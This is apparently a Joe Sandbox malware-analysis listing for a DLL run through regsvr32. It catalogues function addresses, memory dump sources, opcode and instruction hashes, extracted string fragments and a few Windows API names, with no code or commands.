                                                                      • Instruction ID: 1fc7b6a291995fbdf86f990162094adec4a6ac8bfd8304ff1f231a9a9fbecc53
                                                                      • Opcode Fuzzy Hash: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                      • Instruction Fuzzy Hash: 76619A73B08A86D7DA689B64DD943E973E0FB8A301F188136D75D87A88CF7CE4649701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180011AD0 Relevance: 5.3, Strings: 4, Instructions: 335COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: V$@$P9$^_"
                                                                      • API String ID: 0-1880944046
                                                                      • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                      • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                      • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                      • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: =_$F)k$b/$syG
                                                                      • API String ID: 0-3955183656
                                                                      • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                      • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                      • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                      • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180002D70 Relevance: 5.3, Strings: 4, Instructions: 266COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X$'Xsa$iJ6$vG
                                                                      • API String ID: 0-746338152
                                                                      • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                      • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                      • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                      • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800097C0 Relevance: 5.3, Strings: 4, Instructions: 257COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *i^$MIC$-Z$]2
                                                                      • API String ID: 0-498664264
                                                                      • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                      • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                      • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                      • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180027F9C Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >97"$?$LsRW$~x
                                                                      • API String ID: 0-2554301858
                                                                      • Opcode ID: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                      • Instruction ID: eb38a845d203af82144c13b3f151f5fa827cd0cb8678597ee03ac1a376820114
                                                                      • Opcode Fuzzy Hash: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                      • Instruction Fuzzy Hash: E1D1E7705067C8CBEBBADFA4D885BCD3BA8FB44744F106219EC4AEA250DB745749CB01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180010758 Relevance: 5.2, Strings: 4, Instructions: 222COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B$EG$QsF$_
                                                                      • API String ID: 0-784369960
                                                                      • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                      • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                      • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                      • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180020334 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -`G$.$5B.Y$Z`35
                                                                      • API String ID: 0-1363032466
                                                                      • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                      • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                      • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                      • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000EE98 Relevance: 5.2, Strings: 4, Instructions: 167COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *+_$WSh$\O$#o
                                                                      • API String ID: 0-1846314129
                                                                      • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                      • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                      • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                      • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180024D80 Relevance: 5.2, Strings: 4, Instructions: 155COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .B$O$M*K$\<
                                                                      • API String ID: 0-3225238681
                                                                      • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                      • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                      • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                      • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018002A42C Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$$$xVO$~O
                                                                      • API String ID: 0-3655128719
                                                                      • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                      • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                      • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                      • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800024B8 Relevance: 5.1, Strings: 4, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,IW$G$JMg$l
                                                                      • API String ID: 0-1370644289
                                                                      • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                      • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                      • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                      • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AAF70 Relevance: 4.9, APIs: 3, Instructions: 435COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$__tzset
                                                                      • String ID:
                                                                      • API String ID: 3587134695-0
                                                                      • Opcode ID: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                      • Instruction ID: 1bad245395f53795e92f7c5d10843aefde54aaad6d4d16c46b6e41539bcdf361
                                                                      • Opcode Fuzzy Hash: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                      • Instruction Fuzzy Hash: CF028632A08682CFE7648F29989113D67D1FB66741F2CC03AD74E46E99CFB9E944E701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AFB6C Relevance: 4.6, APIs: 3, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$DecodePointer_lock
                                                                      • String ID:
                                                                      • API String ID: 2175075375-0
                                                                      • Opcode ID: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                      • Instruction ID: 42b9b397caaf8a2a8f3f860aaa3937065632f47d3ec97fb9009ee237a911c528
                                                                      • Opcode Fuzzy Hash: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                      • Instruction Fuzzy Hash: C331BE21B0D743C2FB659B62991137B61D1DF56384F1CC034DE4E46E8EDFAEE400A202
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AD318 Relevance: 4.5, APIs: 3, Instructions: 43COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlCaptureContext.KERNEL32 ref: 00007FFA526AD357
                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFA526AD39D
                                                                      • UnhandledExceptionFilter.KERNEL32 ref: 00007FFA526AD3A8
                                                                        • Part of subcall function 00007FFA526A6F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFA526A7194,?,?,?,?,00007FFA526A6C69,?,?,00000000,00007FFA526A30C0), ref: 00007FFA526A6FCF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
                                                                      • String ID:
                                                                      • API String ID: 2731829486-0
                                                                      • Opcode ID: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                      • Instruction ID: 3ae90d7e6c002a8eccf06b8bc917f1851b6b32ac1c506c86938356e77a110609
                                                                      • Opcode Fuzzy Hash: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                      • Instruction Fuzzy Hash: 91114F25A2CA8682EB259B54EC543BA63D1FFC7304F488139D58D02E9DDFADE105CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001496C Relevance: 4.2, Strings: 3, Instructions: 493COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *4$5F$S^r
                                                                      • API String ID: 0-3556444313
                                                                      • Opcode ID: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
                                                                      • Instruction ID: 3ee7e47d854a132278560872cba22db18b0762c6b33e49020313469b2ebed1ad
                                                                      • Opcode Fuzzy Hash: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
                                                                      • Instruction Fuzzy Hash: 5542F87154478C8BDBB8CF28C88D7DE7BE0FB54344F20461DE9AA8A261DBB49685CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001BB04 Relevance: 4.0, Strings: 3, Instructions: 286COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: &lz2$'~W$<x<
                                                                      • API String ID: 0-2268522332
                                                                      • Opcode ID: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
                                                                      • Instruction ID: 36e71a14450f7168630c03d0025ff7d4b6ed06a40f4a953d8196177a15a51c97
                                                                      • Opcode Fuzzy Hash: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
                                                                      • Instruction Fuzzy Hash: 47E10574A14B0C8BDB69DFB8D04A6CDBBF2FB54344F20411DE80AAB292D7B49519CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000BDD0 Relevance: 4.0, Strings: 3, Instructions: 262COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: o6.$s8Q${Fl&
                                                                      • API String ID: 0-2665016659
                                                                      • Opcode ID: 511a0316ce8a18d61ca04810737b4ff370b750d3f2d96c2fe29b5a7c249dfd58
                                                                      • Instruction ID: 345269621f88c341702fdf3610a73dbdf39058324611beb6fba665c489d4de0b
                                                                      • Opcode Fuzzy Hash: 511a0316ce8a18d61ca04810737b4ff370b750d3f2d96c2fe29b5a7c249dfd58
                                                                      • Instruction Fuzzy Hash: 48E1D7705087C88BDBFEDF64C88A7DA7BACFB44708F105219EA4A8E258DB745749CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180020768 Relevance: 4.0, Strings: 3, Instructions: 260COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$T]0$ba^2
                                                                      • API String ID: 0-1276948933
                                                                      • Opcode ID: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                      • Instruction ID: eef8b44dd2583dc88dd368a4c81b8d58a3d6fa2c6a2b719c97d70d037daa09dd
                                                                      • Opcode Fuzzy Hash: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                      • Instruction Fuzzy Hash: 1CD11470510748DBCB99CF24C88AADD7FB1FB483A8FA42219FD06A7260C775D984CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001D49C Relevance: 4.0, Strings: 3, Instructions: 228COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6w5*$EDO$V
                                                                      • API String ID: 0-1640223502
                                                                      • Opcode ID: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                      • Instruction ID: 2aad62a72125add12bf3ce521e9508149cfd3cbf44ea5784fb3c25a9d2cdfef8
                                                                      • Opcode Fuzzy Hash: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                      • Instruction Fuzzy Hash: 07B1E67160560ECFCB88DF28C5866DE3BE0FB48318F41422AF90AA7354D774DA68CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000A6EC Relevance: 4.0, Strings: 3, Instructions: 212COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Y()$i_"o$|Y
                                                                      • API String ID: 0-942011364
                                                                      • Opcode ID: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                      • Instruction ID: 0f698cdcb9f5af38e2ff44253ec0ac71ef144d8643f40abc7fb7ff20982184b6
                                                                      • Opcode Fuzzy Hash: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                      • Instruction Fuzzy Hash: 5AC1F7706083889FDBBEDF28C8857CA7BA9FB46708F504519EDC98E254DB745744CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180017378 Relevance: 3.9, Strings: 3, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: O)$,G$-
                                                                      • API String ID: 0-23008916
                                                                      • Opcode ID: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                      • Instruction ID: 8302e34eee3504d26b36c965fbed976e69713b67a0f5c478fb5ffa9ec871fbb1
                                                                      • Opcode Fuzzy Hash: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                      • Instruction Fuzzy Hash: 6E81F7705106499BCF88DF28C8D6ADD7FB1FB483A8F956219FD0AA6250C774D885CB84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000A270 Relevance: 3.9, Strings: 3, Instructions: 158COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;U[$L$Q#
                                                                      • API String ID: 0-2933747092
                                                                      • Opcode ID: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                      • Instruction ID: c6ef39cbec2f0f72f24e8f037401308b0178ea645a608ff4f3f67d7bb634a9bb
                                                                      • Opcode Fuzzy Hash: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                      • Instruction Fuzzy Hash: 0B614E70A0870CAFDB48DF94C14AADDBBF2FB54344F0081A9E806AB251D7B59B59CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001DFB4 Relevance: 3.9, Strings: 3, Instructions: 144COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5($<:*$qwX
                                                                      • API String ID: 0-3944236288
                                                                      • Opcode ID: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                      • Instruction ID: 7f83292775578326f1885df61e48a3f2c5c3ff73894a37d4b388f2926162ec41
                                                                      • Opcode Fuzzy Hash: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                      • Instruction Fuzzy Hash: 5B71067015878CDBEBBADF24C8897DD3BB0FB49344F90861AE84E8A250CF74574A9B41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001C05C Relevance: 3.9, Strings: 3, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 79&$s`~$v;
                                                                      • API String ID: 0-3844292866
                                                                      • Opcode ID: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                      • Instruction ID: c39f2861ae99e8b3f2b4a79ea52bf03a0f7a6e48d35fb935a0be7420e121cddb
                                                                      • Opcode Fuzzy Hash: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                      • Instruction Fuzzy Hash: 9B61397110478CAFDBFA9E58CC85BDD37A0FB48348F508229E9098B290DF749B4D9B46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000551C Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: wQ_$1_$ac
                                                                      • API String ID: 0-1037425278
